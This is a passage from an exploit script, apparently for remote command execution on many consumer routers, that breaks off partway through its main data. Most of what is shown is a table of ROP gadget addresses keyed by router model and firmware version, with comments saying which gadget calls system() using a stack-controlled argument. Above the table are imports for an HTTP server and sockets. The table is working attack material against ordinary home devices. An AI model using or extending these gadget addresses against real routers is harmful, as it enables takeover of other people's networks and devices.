V1.0.2.18_10.3.15 df58b36f5047a5e6092b91851b46d235 Untested +# XR300 V1.0.1.4_10.1.4 c15de8b9c78405d565b29c5a2a01eda1 Untested +# +import SimpleHTTPServer +import SocketServer +import argparse +import collections +import os +import shutil +import socket +import struct +import sys +import time + +########################################################################### +## Version Info ########################################################### +########################################################################### + +# Gadget addresses used in the exploit. 
+address_info = { + "AC1450" : { + # 0) gadget: calls system($sp) + "1.0.0.36" : 0x2958c, + "1.0.0.34" : 0x28bd8, + "1.0.0.22" : 0x27cc4, + "1.0.0.14" : 0x27cc4, + "1.0.0.8" : 0x27ca4, + "1.0.0.6" : 0x27ca4, + }, + "D6220" : { + # 0) gadget: calls system($sp+0x18) + "1.0.0.52" : 0x417CF8, + "1.0.0.48" : 0x417CF8, + "1.0.0.46" : 0x417CF8, + "1.0.0.44" : 0x4179B8, + "1.0.0.40" : 0x4179B8, + "1.0.0.36" : 0x417864, + "1.0.0.34" : 0x417864, + "1.0.0.32" : 0x4178D4, + "1.0.0.28" : 0x417804, + "1.0.0.24" : 0x41736C, + "1.0.0.22" : 0x416F54, + "1.0.0.16" : 0x416034, + }, + "D6300" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.102" : [0x44232C, 0x412D40], + "1.0.0.96" : [0x441CFC, 0x412BA8], + "1.0.0.90" : [0x441CFC, 0x412BA8], + "1.0.0.88" : [0x441D2C, 0x412BA8], + "1.0.0.76" : [0x4418BC, 0x412A88], + "1.0.0.72" : [0x440C8C, 0x412748], + "1.0.0.42" : [0x438224, 0x411CB4], + "1.0.0.30" : [0x438224, 0x411CB4], + "1.0.0.24" : [0x437FC4, 0x411C34], + "1.0.0.16" : [0x438024, 0x411BA8], + }, + "D6400" : { + # 0) gadget: calls system($sp+0x18) + "1.0.0.88" : 0x417CA8, + "1.0.0.86" : 0x417CA8, + "1.0.0.82" : 0x417CA8, + "1.0.0.80" : 0x417CA8, + "1.0.0.78" : 0x417968, + "1.0.0.74" : 0x417968, + "1.0.0.70" : 0x417814, + "1.0.0.68" : 0x417814, + "1.0.0.66" : 0x4177B4, + "1.0.0.60" : 0x4176E4, + "1.0.0.58" : 0x4172FC, + "1.0.0.56" : 0x416EF4, + "1.0.0.54" : 0x416764, + "1.0.0.52" : 0x4160C4, + "1.0.0.44" : 0x415FC4, + "1.0.0.38" : 0x434B28, + "1.0.0.34" : 0x433FD8, + "1.0.0.22" : 0x432098, + }, + "D7000V2" : { + # 0) gadget: calls system($sp+0x18) + "1.0.0.56" : 0x41667C, + "1.0.0.53" : 0x41667C, + "1.0.0.52" : 0x41667C, + "1.0.0.51" : 0x41667C, + "1.0.0.47" : 0x41631C, + "1.0.0.45" : 0x41627C, + "1.0.0.44" : 0x41627C, + "1.0.0.40" : 0x41619C, + "1.0.0.38" : 0x415D4C, + }, + "D8500" : { + # 0) gadget: calls system($sp) + "1.0.3.44" : 0x3b3f8, + "1.0.3.43" : 0x3afd0, + "1.0.3.42" : 0x3afd0, + 
"1.0.3.39" : 0x3ac0c, + "1.0.3.36" : 0x3a9c8, + "1.0.3.35" : 0x3a994, + "1.0.3.28" : 0x3a500, + "1.0.3.27" : 0x3a254, + "1.0.3.25" : 0x39d88, + }, + "DC112A" : { + # 0) gadget: calls system($sp) + "1.0.0.44" : 0x2e3cc, + "1.0.0.30" : 0x2d0e0, + "1.0.0.24" : 0x2d224, + }, + "DGN2200" : { + # 0) set $a0 to $sp+0x1B9 then jumps to $s1 + # 1) calls system without setting $a0 + "1.0.0.58" : [0x44DD40, 0x44BCEC], + "1.0.0.57" : [0x44D3A0, 0x44B360], + "1.0.0.55" : [0x44D300, 0x44B2C0], + "1.0.0.52" : [0x44BEF0, 0x449EB0], + "1.0.0.50NA" : [0x44BA54, 0x449A14], + "1.0.0.36" : [0x449438, 0x447490], + "1.0.0.36NA" : [0x44908C, 0x4470E4], + }, + "DGN2200V4" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.110" : [0x4336D4, 0x407370], + "1.0.0.108" : [0x4331C4, 0x407370], + "1.0.0.102" : [0x432F64, 0x407370], + "1.0.0.98" : [0x432CF4, 0x4072A0], + "1.0.0.90" : [0x432BA4, 0x407280], + "1.0.0.86" : [0x4328A4, 0x407280], + "1.0.0.82" : [0x431E44, 0x407220], + "1.0.0.76" : [0x431954, 0x4071E0], + "1.0.0.66" : [0x431104, 0x41232C], + "1.0.0.62" : [0x431104, 0x41232C], + "1.0.0.58" : [0x431104, 0x41232C], + "1.0.0.46" : [0x431104, 0x41232C], + "1.0.0.24" : [0x42BAE0, 0x412278], + "1.0.0.5" : [0x42B150, 0x411D5C], + }, + "DGN2200M" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.37" : [0x486B70, 0x411F88], + "1.0.0.35" : [0x484560, 0x411EE8], + "1.0.0.35NA" : [0x483F90, 0x411F08], + "1.0.0.33" : [0x483D90, 0x411F34], + "1.0.0.33NA" : [0x483780, 0x411F54], + "1.0.0.26" : [0x474B60, 0x410520], + "1.0.0.24NA" : [0x474350, 0x4104D8], + }, + "DGND3700" : { + # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0) + # 1) gadget: set $a0 to $sp+0x19 and calls $t9 + "1.0.0.17" : [0x484EF4, 0x4107DC], + "1.0.0.17NA" : [0x4848F4, 0x4107DC], + "1.0.0.12" : [0x484914, 0x4107BC], + "1.0.0.12NA" : [0x484314, 
0x4107BC],
+ },
+ "EX3700" : {
+ # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address
+ # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp);
+ # - The end of the _init_proc function
+ # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset
+ # - The beginning of the build_asp_handler_table function
+ "1.0.0.78" : [0x61fdf0+0x724, 0x40b680, 0x41d3c4],
+ "1.0.0.76" : [0x61f1c0+0x724, 0x40b6b8, 0x41d3a4],
+ "1.0.0.72" : [0x61df20+0x73c, 0x40b8b0, 0x41e064],
+ "1.0.0.70" : [0x61dcd0+0x740, 0x40b874, 0x41e024],
+ "1.0.0.68" : [0x621d20+0x734, 0x40b650, 0x41c8d8],
+ "1.0.0.64" : [0x61e020+0x72c, 0x40b544, 0x41c7c8],
+ "1.0.0.62" : [0x61dd20+0x72c, 0x40b544, 0x41c618],
+ "1.0.0.58" : [0x61dd20+0x72c, 0x40b544, 0x41c618],
+ "1.0.0.50" : [0x61dcc0+0x72c, 0x40b544, 0x41c618],
+ "1.0.0.48" : [0x61ecb0+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.46" : [0x61df10+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.44" : [0x61de40+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.34" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.28" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.26" : [0x61d610+0x72c, 0x40b61c, 0x41e9dc],
+ "1.0.0.24" : [0x61d580+0x72c, 0x40b61c, 0x41e9dc],
+ "1.0.0.22" : [0x61d440+0x72c, 0x40b61c, 0x41e9dc],
+ },
+ "EX3800" : {
+ # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address
+ # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp);
+ # - The end of the _init_proc function
+ # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset
+ # - The beginning of the build_asp_handler_table function
+ "1.0.0.78" : [0x61fdf0+0x724, 0x40b680, 0x41d3c4],
+ "1.0.0.76" : [0x61f1c0+0x724, 0x40b6b8, 0x41d3a4],
+ "1.0.0.72" : [0x61df20+0x73c, 0x40b8b0, 0x41e064],
+ "1.0.0.70" : [0x61dcd0+0x740, 0x40b874, 0x41e024],
+ "1.0.0.68" : [0x621d20+0x734, 0x40b650, 0x41c8d8],
+ "1.0.0.64" : [0x61e020+0x72c, 0x40b544, 0x41c7c8],
+ "1.0.0.62" : [0x61dd20+0x72c, 0x40b544, 0x41c618],
+ "1.0.0.58" : [0x61dd20+0x72c, 0x40b544, 0x41c618],
+ "1.0.0.50" : [0x61dcc0+0x72c, 0x40b544, 0x41c618],
+ "1.0.0.48" : [0x61ecb0+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.46" : [0x61df10+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.44" : [0x61de40+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.34" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.28" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.26" : [0x61d610+0x72c, 0x40b61c, 0x41e9dc],
+ },
+ "EX3920" : {
+ # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address
+ # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp);
+ # - The end of the _init_proc function
+ # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset
+ # - The beginning of the build_asp_handler_table function
+ "1.0.0.78" : [0x61fdf0+0x724, 0x40b680, 0x41d3c4],
+ "1.0.0.76" : [0x61f1c0+0x724, 0x40b6b8, 0x41d3a4],
+ "1.0.0.72" : [0x61df20+0x73c, 0x40b8b0, 0x41e064],
+ "1.0.0.70" : [0x61dcd0+0x740, 0x40b874, 0x41e024],
+ "1.0.0.68" : [0x621d20+0x734, 0x40b650, 0x41c8d8],
+ "1.0.0.64" : [0x61e020+0x72c, 0x40b544, 0x41c7c8],
+ "1.0.0.62" : [0x61dd20+0x72c, 0x40b544, 0x41c618],
+ "1.0.0.58" : [0x61dd20+0x72c, 0x40b544, 0x41c618],
+ "1.0.0.50" : [0x61dcc0+0x72c, 0x40b544, 0x41c618],
+ "1.0.0.48" : [0x61ecb0+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.46" : [0x61df10+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.44" : [0x61de40+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.34" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.28" : [0x61ddb0+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.26" : [0x61d610+0x72c, 0x40b61c, 0x41e9dc],
+ },
+ "EX6000" : {
+ # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address
+ # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp);
+ # - The end of the _init_proc function
+ # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset
+ # - The beginning of the build_asp_handler_table function
+ "1.0.0.38" : [0x61fd80+0x724, 0x40b680, 0x41d3c4],
+ "1.0.0.32" : [0x61deb0+0x73c, 0x40b8b0, 0x41e064],
+ "1.0.0.30" : [0x61dcd0+0x740, 0x40b874, 0x41e024],
+ "1.0.0.28" : [0x621d20+0x734, 0x40b650, 0x41c8d8],
+ "1.0.0.24" : [0x61dfb0+0x72c, 0x40b544, 0x41c7c8],
+ "1.0.0.20" : [0x61dd20+0x72c, 0x40b544, 0x41c618],
+ "1.0.0.10" : [0x61e000+0x730, 0x40b684, 0x41ea4c],
+ },
+ "EX6100" : {
+ # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address
+ # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp);
+ # - The end of the _init_proc function
+ # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset
+ # - The beginning of the build_asp_handler_table function
+ "1.0.2.24" : [0x61e590+0x72c, 0x40b5b4, 0x41d0f4],
+ "1.0.2.18" : [0x6235e0+0x740, 0x40b6a4, 0x41c778],
+ "1.0.2.16" : [0x6235e0+0x740, 0x40b6a4, 0x41c778],
+ "1.0.2.6" : [0x6235e0+0x740, 0x40b6a4, 0x41c7a8],
+ "1.0.1.36" : [0x6225e0+0x740, 0x40b684, 0x41c588],
+ "1.0.0.28" : [0x5df540+0x700, 0x40aef8, 0x41ffa4],
+ "1.0.0.22" : [0x5de4f0+0x700, 0x40aedc, 0x41ff60],
+ },
+ "EX6120" : {
+ # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address
+ # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp);
+ # - The end of the _init_proc function
+ # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset
+ # - The beginning of the build_asp_handler_table function
+ "1.0.0.48" : [0x61fdf0+0x724, 0x40b680, 0x41d3c4],
+ "1.0.0.46" : [0x61f1d0+0x724, 0x40b6b8, 0x41d3a4],
+ "1.0.0.42" : [0x61df20+0x73c, 0x40b8b0, 0x41e064],
+ "1.0.0.40" : [0x61dcd0+0x740, 0x40b874, 0x41e024],
+ "1.0.0.36" : [0x621d20+0x734, 0x40b650, 0x41c8d8],
+ "1.0.0.32" : [0x61e020+0x72c, 0x40b544, 0x41c7c8],
+ "1.0.0.30" : [0x61dd20+0x72c, 0x40b544, 0x41c618],
+ "1.0.0.28" : [0x61dd20+0x72c, 0x40b544, 0x41c618],
+ "1.0.0.26" : [0x61dd20+0x72c, 0x40b544, 0x41c618],
+ "1.0.0.16" : [0x61e4b0+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.14" : [0x61dfc0+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.8" : [0x61dfc0+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.4" : [0x61df60+0x730, 0x40b684, 0x41ea4c],
+ },
+ "EX6130" : {
+ # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address
+ # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp);
+ # - The end of the _init_proc function
+ # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset
+ # - The beginning of the build_asp_handler_table function
+ "1.0.0.30" : [0x61fdf0+0x724, 0x40b680, 0x41d3c4],
+ "1.0.0.28" : [0x61f1d0+0x724, 0x40b6b8, 0x41d3a4],
+ "1.0.0.24" : [0x61df20+0x73c, 0x40b8b0, 0x41e064],
+ "1.0.0.22" : [0x61dcd0+0x740, 0x40b874, 0x41e024],
+ "1.0.0.20" : [0x621d20+0x734, 0x40b650, 0x41c8d8],
+ "1.0.0.16" : [0x61dd20+0x72c, 0x40b544, 0x41c5e8],
+ "1.0.0.12" : [0x61dd20+0x72c, 0x40b544, 0x41c618],
+ },
+ "EX6150" : {
+ # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address
+ # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp);
+ # - The end of the _term_proc function
+ # 2) gadget: set $fp to $sp, set $a0 to $sp+0x25, and calls memset
+ # - The beginning of the build_asp_handler_table function
+ "1.0.0.42" : [0x56ab80+0x2e8, 0x522b40, 0x417748],
+ "1.0.0.34" : [0x570f00+0x208, 0x522ff0, 0x416b50],
+ "1.0.0.32" : [0x570d30+0x208, 0x522ff0, 0x416b50],
+ "1.0.0.28" : [0x570d20+0x208, 0x522ff0, 0x416b50],
+ "1.0.0.16" : [0x570b90+0x208, 0x522e00, 0x416b50],
+ "1.0.0.14" : [0x570b00+0x204, 0x522e20, 0x418828],
+ },
+ "EX6200" : {
+ # 0) gadget: calls system($sp)
+ "1.0.3.90" : 0x226f8,
+ "1.0.3.88" : 0x226f8,
+ "1.0.3.82" : 0x223fc,
+ "1.0.3.76" : 0x220d0,
+ "1.0.3.74" : 0x220b0,
+ "1.0.3.68" : 0x21f50,
+ "1.0.1.60" : 0x21260,
+ "1.0.0.52" : 0x20e2c,
+ "1.0.0.46" : 0x20e2c,
+ "1.0.0.42" : 0x20e2c,
+ "1.0.0.38" : 0x20df0,
+ },
+ "EX6920" : {
+ # 0) The $gp value so that a 'lw $t9, memset' will actually load system's address
+ # 1) gadget: lw $gp,0x10($sp); lw $ra,0x1c($sp);
+ # - The end of the _init_proc function
+ # 2) gadget: set $fp to $sp, set $a0 to $sp+0x21, and calls memset
+ # - The beginning of the build_asp_handler_table function
+ "1.0.0.40" : [0x61dcd0+0x740, 0x40b874, 0x41e024],
+ "1.0.0.36" : [0x621d20+0x734, 0x40b650, 0x41c8d8],
+ "1.0.0.32" : [0x61e020+0x72c, 0x40b544, 0x41c7c8],
+ "1.0.0.30" : [0x61dd20+0x72c, 0x40b544, 0x41c618],
+ "1.0.0.28" : [0x61dd20+0x72c, 0x40b544, 0x41c618],
+ "1.0.0.26" : [0x61dd20+0x72c, 0x40b544, 0x41c618],
+ "1.0.0.16" : [0x61e4b0+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.14" : [0x61dfc0+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.8" : [0x61dfc0+0x730, 0x40b684, 0x41ea4c],
+ "1.0.0.4" : [0x61df60+0x730, 0x40b684, 0x41ea4c],
+ },
+ "EX7000" : {
+ # 0) gadget: calls system($sp)
+ "1.0.1.84" : 0x26f64,
+ "1.0.1.80" : 0x26f64,
+ "1.0.1.78" : 0x26d8c,
+ "1.0.0.66" : 0x2352c,
+ "1.0.0.62" : 0x2287c,
+ "1.0.0.58" : 0x2287c,
+ "1.0.0.56" : 0x2287c,
+ "1.0.0.50" : 0x225d4,
+ "1.0.0.42" : 0x22430,
+ "1.0.0.38" : 0x22370,
+ "1.0.0.36" : 0x223bc,
+ "1.0.0.32" : 0x22bc0,
+ "1.0.0.30" : 0x22bc0,
+ },
+ "LG2200D" : {
+ # 0) gadget: calls system($sp+0x78)
+ "1.0.0.57" : 0x44f90c,
+ },
+ "MBM621" : {
+ # 0) gadget: calls system($sp+0x18)
+ "1.1.3" : 0x4126b8,
+ },
+ "MBR624GU" : {
+ # 0) gadget: calls system($sp)
+ "6.1.30.64" : 0x19728,
+ "6.1.30.61" : 0x19680,
+ "6.1.30.59" : 0x19680,
+ "6.1.30.59NA" : 0x19394,
+ "6.0.30.46" : 0x196ac,
+ "6.0.28.43" : 0x1932c,
+ "6.0.28.43NA" : 0x19618,
+ "6.0.26.21" : 0x1897c,
+ "6.0.22.14NA" : 0x18190,
+ "6.0.22.12" : 0x18190,
+ },
+ "MBR1200" : {
+ # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0)
+ # 1) gadget: set $a0 to $sp+0x19 and calls $t9
+ "1.2.2.53" : [0x4711C0, 0x40CDD0],
+ },
+ "MBR1515" : {
+ # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0)
+ # 1) gadget: set $a0 to $sp+0x19 and calls $t9
+ "1.2.2.68" : [0x48CFE0, 0x412A38],
+ },
+ "MBR1516" : {
+ # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0)
+ # 1) gadget: set $a0 to $sp+0x19 and calls $t9
+ "1.2.2.84BM" : [0x48A210, 0x412534],
+ },
+ "MBRN3000" : {
+ # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0)
+ # 1) gadget: set $a0 to $sp+0x19 and calls $t9
+ "1.0.0.74" : [0x462750, 0x40CB10],
+ "1.0.0.72" : [0x4602A0, 0x40CA20],
+ "1.0.0.72NA" : [0x45FF40, 0x40CA40],
+ "1.0.0.69" : [0x45FB80, 0x40CA68],
+ "1.0.0.69NA" : [0x45F7F0, 0x40CA98],
+ "1.0.0.65" : [0x45FA30, 0x40CA38],
+ "1.0.0.65NA" : [0x45F6B0, 0x40CA78],
+ "1.0.0.43NA" : [0x45BE74, 0x40C34C],
+ },
+ "MVBR1210C" : {
+ # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0)
+ # 1) gadget: set $a0 to $sp+0x19 and calls $t9
+ "1.2.0.35" : [0x48AA20, 0x41113C],
+ },
+ "R4500" : {
+ # 0) gadget: calls system($sp+0x78)
+ "1.0.0.4" : 0x4430dc,
+ },
+ "R6200" : {
+ # 0) gadget: set $t9 to system (by calling system(NULL) when $s0 is 0)
+ # 1) gadget: set $a0 to $sp+0x19 and calls $t9
+ "1.0.1.58" : [0x43DBA8, 0x41A4EC],
+ "1.0.1.56" : [0x43DB58, 0x41A4EC],
+ "1.0.1.52" : [0x43DB58, 0x41A4EC],
+ "1.0.1.48" : [0x43D028, 0x41A2AC],
+ "1.0.1.46" : [0x43CEB8, 0x41A0DC],
+ "1.0.0.28" : [0x43B808, 0x419598],
+ "1.0.0.18" : [0x43AD90, 0x418BC8],
+ },
+ "R6200V2" : {
+ # 0) gadget: calls system($sp)
+ "1.0.3.12" : 0x2c460,
+ "1.0.3.10" : 0x2c430,
+ "1.0.1.20" : 0x280dc,
+ "1.0.1.18" : 0x280dc,
+ "1.0.1.16" : 0x280dc,
+ "1.0.1.14" : 0x280dc,
+ },
+ "R6250" : {
+ # 0) gadget: calls system($sp)
+ "1.0.4.38" : 0x2f2dc,
+ "1.0.4.36" : 0x2f2dc,
+ "1.0.4.34" : 0x2f2e4,
+ "1.0.4.26" : 0x2eba0,
+ "1.0.4.20" : 0x2e82c,
+ "1.0.4.16" : 0x2d82c,
+ "1.0.4.14" : 0x2d718,
+ "1.0.4.12" : 0x2d708,
+ "1.0.4.08" : 0x2d0b0,
+ "1.0.4.06" : 0x2cf58,
+ "1.0.4.02" : 0x2ccac,
+ "1.0.3.12" : 0x2c430,
+ "1.0.3.06" : 0x2c430,
+ "1.0.1.84" : 0x28100,
+ "1.0.1.82" : 0x28100,
+ "1.0.1.80" : 0x28100,
+ "1.0.0.72" : 0x27cd8,
+ "1.0.0.70" : 0x27cd8,
+ "1.0.0.62" : 0x27cd8,
+ },
+ "R6300" : {
+ # 0) gadget: calls system($sp+0x78)
+ "1.0.2.80" : 0x44727C,
+ "1.0.2.78" : 0x446C2C,
+ "1.0.2.76" : 0x446C2C,
+ "1.0.2.70" : 0x446A3C,
+ "1.0.2.68" : 0x446A3C,
+ "1.0.2.38" : 0x44673C,
+ "1.0.2.36" : 0x44673C,
+ "1.0.2.26" : 0x445E1C,
+ "1.0.2.14" : 0x4443CC,
+ "1.0.2.10" : 0x4443CC,
+ "1.0.0.90" : 0x4443CC,
+ "1.0.0.68" : 0x44439C,
+ },
+ "R6300V2" : {
+ # 0) gadget: calls system($sp)
+ "1.0.4.36" : 0x2a65c,
+ "1.0.4.34" : 0x2a65c,
+ "1.0.4.32" : 0x2A53C,
+ "1.0.4.28" : 0x29fc0,
+ "1.0.4.24" : 0x29ee8,
+ "1.0.4.8" : 0x295d0,
+ "1.0.4.6" : 0x290f0,
+ "1.0.4.2" : 0x28c10,
+ "1.0.3.30" : 0x28c10,
+ "1.0.3.28" : 0x286d4,
+ "1.0.3.26" : 0x286d4,
+ "1.0.3.22" : 0x28728,
+ "1.0.3.8" : 0x2862C,
+ "1.0.3.6CH" : 0x2bd0c,
+ "1.0.3.2" : 0x2862c,
+ "1.0.2.86" : 0x27cfc,
+ "1.0.2.72" : 0x27cfc,
+ "1.0.1.72" : 0x27cd8,
+ },
+ "R6400" : {
+ # 0) gadget: calls system($sp)
+ "1.0.1.52" : 0x31994,
+ "1.0.1.50" : 0x31974,
+ "1.0.1.46" : 0x31884,
+ "1.0.1.44" : 0x31244,
+ "1.0.1.42" : 0x31204,
+ "1.0.1.36" : 0x30D3C,
+ "1.0.1.34" : 0x30ba8,
+ "1.0.1.26" : 0x30a5c,
+ "1.0.1.24" : 0x30a10,
+ "1.0.1.22" : 0x30904,
+ "1.0.1.20" : 0x30648,
+ "1.0.1.18" : 0x302fc,
+ "1.0.1.12" : 0x2fdf4,
+ "1.0.1.6" : 0x2f6b4,
+ "1.0.0.26" : 0x2f6b4,
+ "1.0.0.24" : 0x2e96c,
+ "1.0.0.20" : 0x2e840,
+ "1.0.0.14" : 0x2e924,
+ },
+ "R6400V2" : {
+ # 0) gadget: calls system($sp)
+ "1.0.4.84" : 0xf9c4,
+ "1.0.4.82" : 0xf9c4,
+ "1.0.4.78" : 0xf980,
+ "1.0.3.66" : 0xf0b0,
+ "1.0.2.66" : 0xf0b0,
+ "1.0.2.62" : 0xf0b0,
+ "1.0.2.60" : 0xf038,
+ "1.0.2.56" : 0x32078,
+ "1.0.2.52" : 0x31718,
+ "1.0.2.50" : 0x314c4,
+ "1.0.2.46" : 0x31414,
+ "1.0.2.44" : 0x313e8,
+ "1.0.2.34" : 0x30e54,
+ "1.0.2.32" : 0x30e1c,
+ "1.0.2.14" : 0x30a94,
+ },
+ "R6700" : {
+ # 0) gadget: calls system($sp)
+ "1.0.2.8" : 0x3cfa0,
+ "1.0.2.6" : 0x38ff4,
+ "1.0.1.48" : 0x3818c,
+ "1.0.1.46" : 0x37e3c,
+ "1.0.1.44" : 0x37d1c,
+ "1.0.1.36" : 0x3779c,
+ "1.0.1.32" : 0x37704,
+ "1.0.1.26" : 0x371f8,
+ "1.0.1.22" : 0x361d0,
+ "1.0.1.20" : 0x35d8c,
+ "1.0.1.16" : 0x35750,
+ "1.0.1.14" : 0x2efac,
+ "1.0.0.26" : 0x2ed28,
+ "1.0.0.24" : 0x2ed28,
+ "1.0.0.2" : 0x2d5c8,
+ },
+ "R6700V3" : {
+ # 0) gadget: calls system($sp)
+ "1.0.4.84" : 0xf9c4,
+ "1.0.4.82" : 0xf9c4,
+ "1.0.4.78" : 0xf980,
+ "1.0.3.66" : 0xf0b0,
+ "1.0.2.66" : 0xf0b0,
+ "1.0.2.62" : 0xf0b0,
+ "1.0.2.60" : 0xf038,
+ "1.0.2.56" : 0x32078,
+ "1.0.2.52" : 0x31718,
+ },
+ "R6900" : {
+ # 0) gadget: calls system($sp)
+ "1.0.2.8" : 0x3cfa0,
+ "1.0.2.6" : 0x38ff4,
+ "1.0.2.4" : 0x38a3c,
+ "1.0.1.48" : 0x3818c,
+ "1.0.1.46" : 0x37e3c,
+ "1.0.1.44" : 0x37d1c,
+ "1.0.1.34" : 0x379e4,
+ "1.0.1.28" : 0x3794c,
+ "1.0.1.26" : 0x371f8,
+ "1.0.1.22" : 0x361d0,
+ "1.0.1.20" : 0x35d8c,
+ "1.0.1.16" : 0x35750,
+ "1.0.1.14" : 0x2efb4,
+ "1.0.0.4" : 0x2ed30,
+ "1.0.0.2" : 0x2ed30,
+ },
+ "R6900P" : {
+ # 0) gadget: calls system($sp)
+ "1.3.1.64" : 0x3a21c,
+ "1.3.1.44" : 0x39904,
+ "1.3.1.26" : 0x37114,
+ "1.3.0.20" : 0x37114,
+ "1.3.0.8" : 0x36ff4,
+ "1.2.0.22" : 0x36ad0,
+ "1.0.1.14" : 0x369f4,
+ "1.0.0.58" : 0x367b8,
+ "1.0.0.46" : 0x3600c,
+ },
+ "R7000" : {
+ # 0) gadget: calls system($sp)
+ "0.96" : 0x2c990,
+ "1.22" : 0x2cc00,
+ "2.16" : 0x2cbec,
+ "2.19" : 0x2d04c,
+ "3.24" : 0x2d608,
+ "3.56" : 0x2d568,
+ "3.60" : 0x2de64,
+ "3.68" : 0x2d5c8,
+ "3.80" : 0x2d5c0,
+ "4.18" : 0x2ecac,
+ "4.28" : 0x2ecf4,
+ "4.30" : 0x2ed30,
+ "5.64" : 0x32520,
+ "5.70" : 0x32768,
+ "7.2" : 0x32768,
+ "7.6" : 0x329e8,
+ "7.10" : 0x32a44,
+ "7.12" : 0x36070,
+ "8.34" : 0x37528,
+ "9.6" : 0x3763C,
+ "9.10" : 0x3794C,
+ "9.12" : 0x3794C,
+ "9.14" : 0x37B08,
+ "9.18" : 0x37B14,
+ "9.26" : 0x37d1c,
+ "9.28" : 0x37dbc,
+ "9.32" : 0x38198,
+ "9.34" : 0x38174,
+ "9.42" : 0x38978,
+ "9.60" : 0x38FF4,
+ "9.64" : 0x3C3C4,
+ "9.88" : 0x3cfb4,
+ "11.100" : 0x3d000,
+ },
+ "R7000P" : {
+ # 0) gadget: calls system($sp)
+ "1.3.1.64" : 0x3a21c,
+ "1.3.1.44" : 0x39904,
+ "1.3.1.26" : 0x37114,
+ "1.3.0.20" : 0x37114,
+ "1.3.0.8" : 0x36ff4,
+ "1.2.0.22" : 0x36ad0,
+ "1.0.1.14" : 0x369f4,
+ "1.0.0.58" : 0x367b8,
+ "1.0.0.56" : 0x36658,
+ "1.0.0.50" : 0x35f40,
+ "1.0.0.46" : 0x3600c,
+ "1.0.0.44" : 0x35dc8,
+ },
+ "R7100LG" : {
+ # 0) gadget: calls system($sp)
+ "1.0.0.52" : 0x342d4,
+ "1.0.0.50" : 0x341e4,
+ "1.0.0.48" : 0x33ec0,
+ "1.0.0.46" : 0x33e80,
+ "1.0.0.42" : 0x339ac,
+ "1.0.0.40" : 0x3397c,
+ "1.0.0.38" : 0x338d8,
+ "1.0.0.36" : 0x338d8,
+ "1.0.0.34" : 0x3381c,
+ "1.0.0.32" : 0x33788,
+ "1.0.0.30" : 0x33520,
+ "1.0.0.28" : 0x3326c,
+ "1.0.0.24" : 0x32f30,
+ },
+ "R7300" : {
+ # 0) gadget: calls system($sp)
+ "1.0.0.74" : 0x33fb0,
+ "1.0.0.70" : 0x33fb8,
+ "1.0.0.68" : 0x33b70,
+ "1.0.0.62" : 0x33740,
+ "1.0.0.60" : 0x33588,
+ "1.0.0.56" : 0x33468,
+ "1.0.0.54" : 0x33458,
+ "1.0.0.52" : 0x331d0,
+ "1.0.0.46" : 0x32d20,
+ "1.0.0.44" : 0x32ae4,
+ "1.0.0.32" : 0x3267c,
+ "1.0.0.26" : 0x32628,
+ },
+ "R7850" : {
+ # 0) gadget: calls system($sp)
+ "1.0.5.48" : 0x36dd0,
+ "1.0.4.46" : 0x36da8,
+ "1.0.4.42" : 0x365b0,
+ },
+ "R7900" : {
+ # 0) gadget: calls system($sp)
+ "1.0.4.22" : 0x36da8,
+ "1.0.3.18" : 0x36da8,
